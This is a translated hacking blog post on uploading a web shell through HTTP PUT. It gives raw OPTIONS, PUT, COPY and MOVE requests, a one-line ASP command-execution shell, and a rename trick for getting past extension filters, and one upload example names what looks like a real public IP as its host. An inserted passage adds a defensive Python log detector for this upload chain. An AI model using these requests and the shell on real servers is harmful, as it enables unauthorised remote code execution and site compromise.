The previous article, "Http-put uploading a file/shell", described setting up an environment to test uploading a shell with HTTP PUT. I recently came across several PUT upload cases and uploaded successfully a few times, so here is the approach I used.
0x00 Determine whether HTTP PUT is allowed
Send a request like this to the server and look at what the server returns:
    OPTIONS / HTTP/1.1
    Host: 192.168.9.151:8086
    Connection: keep-alive
    Accept: text/plain
    User-Agent: Mozilla/5.0 (... 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5
If the return value is 200, you can move on to the next attempt.
0x10 Http-put Upload
Which type of file you need to upload depends on the server-side language, but first of all, try uploading a txt file.
    PUT /test.txt HTTP/1.1
    Content-Length: 31
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; ...)
    Host: 218.94.36.38:9010

    <% Execute (Request ("value"))%>
If the upload succeeds, good. If it does not, there may be a problem with the HTTP request headers. Check the return code against https://msdn.microsoft.com/en-us/library/aa142816(v=exchg.65).aspx
Once that works, upload the Trojan that matches the server-side language:
    PUT /test.asp HTTP/1.1
    Content-Length: 31
    Accept: */*
    Accept-Language: en-us
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; ...)
    Host: 218.94.36.38:9010

    <% Execute (Request ("value"))%>
Even if the request is formatted correctly, the upload may still fail because the server has been configured to block it. No hurry, read on.
0x20 Http-copy/move
This is where the test.txt file that was uploaded successfully earlier comes into play.
    COPY /test.txt HTTP/1.1
    Host: test.com
    Destination: http://test.com/test.asp
    Overwrite: T
Or use MOVE:
    MOVE /dir_name/test.aspx HTTP/1.1
    Destination: /test.aspx
    Host: test.com
Note that MOVE requires that the two files not be in the same folder.
That is about as far as this goes: whatever can be uploaded will have been uploaded by now = = If it still cannot be uploaded, you can try other HTTP methods.
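Seen from the server side, the sequence in 0x10 and 0x20 leaves a recognisable trail in the access log: a PUT of a script file, or a PUT of a harmless file followed by a successful COPY/MOVE of that same path by the same client. The following is an added detection example, not code from the original article. It assumes IIS W3C extended logs that carry the four fields shown and do not record the Destination header. The log lines, addresses and the SCRIPT_EXT list are constructed for illustration.

```python
# Extensions treated as server-side script (assumed list; adjust to the handlers you map).
SCRIPT_EXT = (".asp", ".aspx", ".asa", ".cer", ".php", ".jsp")

# Constructed sample in W3C extended format (not taken from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2015-06-01 10:00:01 203.0.113.7 OPTIONS / 200
2015-06-01 10:00:05 203.0.113.7 PUT /test.txt 201
2015-06-01 10:00:09 203.0.113.7 PUT /test.asp 403
2015-06-01 10:00:15 203.0.113.7 COPY /test.txt 201
2015-06-01 10:02:00 198.51.100.4 GET /index.asp 200
"""

def parse_w3c(text):
    """Yield one dict per request, taking column names from the #Fields: directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_upload_chains(text):
    """Return (client, rule, path) alerts for script PUTs and PUT -> COPY/MOVE renames."""
    alerts = []
    uploaded = set()  # (client, path) pairs successfully written with PUT
    for r in parse_w3c(text):
        ip, method = r["c-ip"], r["cs-method"].upper()
        path = r["cs-uri-stem"].lower()
        ok = r["sc-status"].startswith("2")
        if method == "PUT":
            if path.endswith(SCRIPT_EXT):
                rule = "script-put-ok" if ok else "script-put-blocked"
                alerts.append((ip, rule, path))
            if ok:
                uploaded.add((ip, path))
        elif method in ("COPY", "MOVE") and ok and (ip, path) in uploaded:
            # Destination is not logged, so the rename is inferred from method + path.
            alerts.append((ip, "put-then-" + method.lower(), path))
    return alerts

if __name__ == "__main__":
    for alert in find_upload_chains(SAMPLE_LOG):
        print(*alert)
```

A "script-put-blocked" alert followed by "put-then-copy" from the same client is the pattern to triage first, since it shows the extension filter was sidestepped by renaming.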
0x30 Other
In fact, you could write a browser plugin or a small Python tool that, when a page is opened, automatically detects whether the site allows unusual HTTP methods, or automates the upload. I will keep sharing in follow-up posts ~ ~ ~
Good luck ~< ( ̄3 ̄) >
Http-put Uploading Files/shell (ii)